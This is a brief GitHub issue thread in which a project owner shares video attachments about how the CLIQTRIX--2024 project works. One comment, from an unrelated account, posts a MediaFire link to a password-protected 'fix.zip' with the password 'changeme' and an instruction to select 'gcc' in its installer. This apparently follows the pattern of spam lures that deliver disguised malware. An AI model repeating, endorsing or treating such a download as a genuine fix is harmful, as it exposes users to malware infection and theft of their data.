### ISSUE TITLE
VIDEO HOW THIS PROJECT WORKS

### ISSUE THREAD

**Issue by fazil-2003** [fazil-2003/CLIQTRIX--2024#1]
https://github.com/user-attachments/assets/f21ee53c-73dd-444a-9a09-ef67aa718025

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by fazil-2003** [comment]
https://github.com/user-attachments/assets/79bf3dae-c237-4fba-b2f8-e9ca809bec96
